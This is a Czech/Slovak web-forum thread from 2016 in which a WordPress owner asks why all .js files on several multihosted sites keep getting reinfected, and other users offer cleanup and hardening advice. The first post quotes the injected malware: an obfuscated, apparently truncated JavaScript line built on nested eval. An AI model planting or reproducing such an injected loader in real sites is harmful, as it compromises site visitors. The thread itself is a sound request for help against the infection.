Opakované napadnutie webov Malwarom

8. 2. 2016 16:07:00

Zdravím,

radu webov bežiacich na Wordpresse mi opakovane napadá ten istý typ malwaru, konkrétne sa kód uvedený nižšie dostane do všetky súborov s koncovkou .js na FTP.

Kompletné prečistenie databáz, FTP, zmeny hesiel v databázach / FTP / admistrácia, aktualizácie a ani ďalšie bezpečnostné opatrenia nepomáhajú.

Weby som opakovane preinštaloval, zlepšil zabezpečenie, napriek tomu sa vírus opakovane už x-krát dostal do všetkých súborov končiacich na .js.

Viete mi poradiť, čo presne tento malware robí a ako sa ho zbaviť ?

Pokiaľ má niekto skúsenosti s odstraňovaním tohto typu malwaru = kontaktujte ma, rád zaplatím za trvalé odstránenie.

Odstraňoval som úspešne vírusy už z xy webov, bohužial tento malware sa opakovane vracia a neviem nájsť príčinu problému.

/*1e190e43d3becaabbb0c31c8b65fcbb4*/;window=;var bhnyr=hrynn=zfenb=hzren=byhhs=hefzi=window,yatkk=window;eval(eval(",yatkk,yatkk,yatkk,yatkk,yatkk,yatkk,yatkk,yatkk,yatkk,yatkk,yatkk,yatkk,yatkk,yatkk,yatkk,yatkk,yatkk,yatkk].join("");"));/*1e190e43d3becaabbb0c31c8b65fcbb4*/

8. 2. 2016 16:07:00

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172959

Jiří

(7 hodnocení)

8. 2. 2016 16:36:17

Pročištění FTP / DB nestačí. První to chce pročistit všechny počítače od virů ze kterých je přistupováno k webu vč. ftp / db. Až když jsou všechny počítače čisté, je potřeba teprve čistit web. To znamená nahrát čistou zálohu a změnit hesla.

A také se zbavit děravých či warezových šablon / pluginů.

8. 2. 2016 16:36:17

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172958

Marek L.

(49 hodnocení)

8. 2. 2016 16:42:56

Weby boli čistené nezávisle z viacerých počítačov, x-krát. Používam len doporučené pluginy a šablóny, ktoré sú aktualizované. Žiadne warez šablóny / pluginy z pofiderných zdrojov.

+ pristupoval som zo svojho Macu na x-ďalších serverov, ani jeden z nich nemá rovnaký problém..

8. 2. 2016 16:42:56

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172957

Michal Beránek

(94 hodnocení)

8. 2. 2016 17:05:00

Máte ty weby zvlášť na různých hostinzích nebo všechny na jednom serveru/multihostingu?

8. 2. 2016 17:05:00

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172956

peeeeta

8. 2. 2016 17:05:41

Přeinstalované, znamená, že byli smazána všechny data a nainstalován systém úplně znovu?

nebo byly jen přepsány soubory?

Přepsání nestačí, jelikož většinou jsou přítomny ještě soubory navíc a ty mají za úkol infikovat web znovu. Takovéto soubory, které jsou jedinečné, se nepřepíšou, nemají se totiž čím přespat.

Přečti si tento článek

Masivní únorová infekce WordPress webů – Lynt.cz…

8. 2. 2016 17:05:41

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172955

Marek L.

(49 hodnocení)

8. 2. 2016 22:02:17

Napsal YesWeb;1265041
Máte ty weby zvlášť na různých hostinzích nebo všechny na jednom serveru/multihostingu?

Na multihoste na Wedose. (webhosting s aliasmi)

---------- Příspěvek doplněn 08.02.2016 v 22:03 ----------

Napsal peeeeta;1265042
Přeinstalované, znamená, že byli smazána všechny data a nainstalován systém úplně znovu?
nebo byly jen přepsány soubory?
Přepsání nestačí, jelikož většinou jsou přítomny ještě soubory navíc a ty mají za úkol infikovat web znovu. Takovéto soubory, které jsou jedinečné, se nepřepíšou, nemají se totiž čím přespat.
Přečti si tento článek
Masivní únorová infekce WordPress webů – Lynt.cz…

Všetko dotla odstránené a nainštalované na novo, nový Wordpress stiahnutý z officiálnej stránky + bežne pluginy, ktoré sú pravidelne aktualizované.

8. 2. 2016 22:02:17

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172954

peeeeta

8. 2. 2016 22:07:09

Tak pokud multihosting u wedosu, což jsou aliasy, tak stačí aby byl jeden web děravý a šup už jsou napadnuté všechny weby.

Všechny weby běží jenom na WP?

O jaké pluginy jde a jsou často aktualizované. Instalujete nejnovější verzi WP 4.2.2?

Nevkládáte tedy žádná další data? Ani nijak jinak WP neupravujete? Počítač je překontrolovaný na viry?

8. 2. 2016 22:07:09

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172953

Marek L.

(49 hodnocení)

8. 2. 2016 22:25:02

Najnovšie verzia WP všade, predpokladám, že bude deravý 1 web, aktualizácia prakticky nonstop, až na 1 web, kde neboli úplne všetky pluginy aktualizované.

Skúšali sme odstránenie a kompletnú preinštaláciu x-krát s x-rôznych počítačov. Okrem pár pluginov, bolo všetko dotla vždy pravidelne aktualizované na všetkých weboch.

8. 2. 2016 22:25:02

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172952

peeeeta

8. 2. 2016 22:27:46

I jeden plugin stačí.

Již se napsalo spousty článků o tom, jak i nejznámější pluginy měly velkou bezpečnostní díru.

Pokud si již nevíte rady, požádejte nějakou firmu.

Osobně bych zkusil úplně na jiném PC nahodit na všechny weby čistý wordpress bez dalších pluginů a šablon.

Důležité je také změnit všechny údaje, FTP/databáze/bezpečnostní klíče/prefix tabulek/uživatelské účty/atd .

Potom bych pozoroval, zdali se stále útočník dostal na web.

8. 2. 2016 22:27:46

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172951

Marek L.

(49 hodnocení)

8. 2. 2016 22:30:44

Napsal peeeeta;1265150
I jeden plugin stačí.
Již se napsalo spousty článků o tom, jak i nejznámější pluginy měly velkou bezpečnostní díru.
Pokud si již nevíte rady, požádejte nějakou firmu.
Osobně bych zkusil úplně na jiném PC nahodit na všechny weby čistý wordpress bez dalších pluginů a šablon.
Důležité je také změnit všechny údaje, FTP/databáze/bezpečnostní klíče/prefix tabulek/uživatelské účty/atd .
Potom bych pozoroval, zdali se stále útočník dostal na web.

Toto všetko som spravil presne ako píšete, weby boli chvílku čisté. Následne som postupne nahrával pluginy a šablóny. Prvé dni nič, následne kompletne všetky .js súbory napadnuté.

Netuším, ktorý plugin / šablóna je dieravá. Testovať to po jednom plugine a šablóne je na mesiac a bohužial pri väčšine webov je to problém..

8. 2. 2016 22:30:44

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172950

peeeeta

8. 2. 2016 23:06:08

Nechal bych třeba týden, klidně i dva jen čisté weby, se základními šablonami.

Pokud by se na web nic nedostalo, tak bych potom hledat informace o pluginech.

Když je sem napíšete, možná se dozvíte, který z nich měl jakou chybu ;) .

Více informací znamená lepší odhalení problému.

8. 2. 2016 23:06:08

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172949

Jiří

(7 hodnocení)

8. 2. 2016 23:09:39

Jen tak se zeptám, čím jsi čistil ty počítače ze kterých jsi to přenahrával?

8. 2. 2016 23:09:39

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172948

KRYSTYS

10. 2. 2016 15:03:01

Úplně stejný problém. Virus se šíří na multihostingu velice snadno. Stačí jeden infikovaný soubor (.js) a ten zamoří opět celý vyčištěný webhosting, klidně i nově nainstalovaný WP.

Zazipované soubory to nenapadá.

Tento malware detekuje jak Avast, tak například Sucuri Scanner. Více o tomto viru je napsáno zde: https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection.html

Na WP se mi osvědčil tento plugin: iThemes Security. V celku se tam nastavují všeobecně známé bezpečnostní ochrany (práva souborů, přihlašovací url adresy, silná hesla, google authenticator, zákaz editace souboru skrz wp administraci, logy, časové omezení dostupnost administrace, ssl,...), ale všechno je na jednom místě.

10. 2. 2016 15:03:01

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172947

korwin

(25 hodnocení)

22. 2. 2016 21:39:18

No k tomu, aby byl WP relativně bezpečný je nutné udělat spoustu věcí. Např.

1) Vše mít aktuální (šablony, pluginy, WP).

2) Přejmenovat co nejvíc adresářů co jde. Třebas pluginy jdou, šablony, wp-content.

3) Dát WP do podadresáře např. /websystem a hlavní stránku a home pak nastavit na /

4) Odstranit meta generátor co říká že tato stránka používá WP.

5) Znemožnit přihlášení na /wp-login.php a definovat jinou stránku na přihlášení.

6) Používat komplexní bezpečnostní plugin. Např. iThemes security nebo Wordfence.

7) Správně nastavit práva adresářů a souborů.

8) Používat https.

9) Neukládat hesla k FTP a mít silné FTP a Mysql heslo.

10) Nepřihlašovat se jako admin, zvolit jiné jméno. Např. uZivatel572 a mít silné heslo.

11) Znefunkčnit XML-RCP, pokud ho nepoužíváte. (Wordfence plugin to umí).

12) ? určitě se něco dalšího najde :-)

Pokud todle všechno uděláte, tak se dá říct, že šance, že vás někdo hackne je minimální. Boti si vyberou lehčí kořist v podobě milionů dalších WP stránek co takové zabezpečení nemají.

22. 2. 2016 21:39:18

https://webtrh.cz/diskuse/opakovane-napadnutie-webov-malwarom/#reply1172946

Pro odpověď se přihlašte.

Přihlásit